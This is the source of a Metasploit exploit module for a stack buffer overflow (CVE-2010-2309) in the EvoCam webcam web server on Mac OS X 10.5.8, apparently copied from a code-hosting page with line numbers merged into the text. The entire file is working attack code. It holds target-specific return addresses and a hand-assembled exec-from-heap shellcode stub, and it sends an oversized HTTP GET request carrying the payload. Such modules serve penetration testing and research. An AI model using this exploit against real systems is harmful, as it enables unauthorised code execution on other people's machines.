Path: blob/master/modules/exploits/osx/http/evocam_webserver.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'MacOS X EvoCam HTTP GET Buffer Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in the web server provided with the EvoCam17program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload18from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,193.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.20},21'Author' => [22'Paul Harrington', # Original Exploit Author and MSF Module23'dookie', # MSF Module Assistance24],25'Platform' => 'osx',26'License' => MSF_LICENSE,27'References' => [28['CVE', '2010-2309'],29['OSVDB', '65043'],30['EDB', '12835'],31],32'Payload' => {33'Space' => 300,34'BadChars' => "\x00\xff\x09\x0a\x0b\x0c\x0c\x0d\x20",35'StackAdjustment' => -3500,36},37'Privileged' => false,38'Targets' => [39[40'Mac OS X 10.5.8 x86, EvoCam 3.6.6',41{42'Arch' => ARCH_X86,43'Offset' => 1560,44'Writable' => 0x8fe66448,45'setjmp' => 0x8fe1cf38,46'strdup' => 0x8fe210dc,47'jmp_eax' => 0x8fe0104148}49],50[51'Mac OS X 10.5.8 x86, EvoCam 3.6.7',52{53'Arch' => ARCH_X86,54'Offset' => 1308,55'Writable' => 0x8fe66448,56'setjmp' => 0x8fe1cf38,57'strdup' => 0x8fe210dc,58'jmp_eax' => 0x8fe0104159}60],6162],63'DisclosureDate' => '2010-06-01',64'DefaultTarget' => 1,65'Notes' => {66'Reliability' => UNKNOWN_RELIABILITY,67'Stability' => UNKNOWN_STABILITY,68'SideEffects' => UNKNOWN_SIDE_EFFECTS69}70)71)7273register_options(74[75Opt::RPORT(8080),76]77)78end7980def make_exec_payload_from_heap_stub()81frag0 =82"\x90" + # nop83"\x58" + # pop eax84"\x61" + # popa85"\xc3" # ret8687frag1 =88"\x90" + # nop89"\x58" + # pop eax90"\x89\xe0" + # mov eax, esp91"\x83\xc0\x0e" + # add eax, byte +0xc92"\x89\x44\x24\x08" + # mov [esp+0x8], eax93"\xc3" # ret9495setjmp = target['setjmp']96writable = target['Writable']97strdup = target['strdup']98jmp_eax = target['jmp_eax']99100exec_payload_from_heap_stub =101frag0 +102[setjmp].pack('V') +103[writable + 32, writable].pack("V2") +104frag1 +105"X" * 20 +106[setjmp].pack('V') +107[writable + 24, writable, strdup, jmp_eax].pack("V4") +108"X" * 4109end110111def exploit112connect113114offset = target['Offset']115116buffer = "GET "117buffer << rand_text_alpha_upper(offset)118buffer << make_exec_payload_from_heap_stub()119buffer << "\x90\x90"120buffer << payload.encoded121buffer << " HTTP/1.0\r\n\r\n"122123sock.put(buffer)124sock.close125126handler()127disconnect128end129end130131132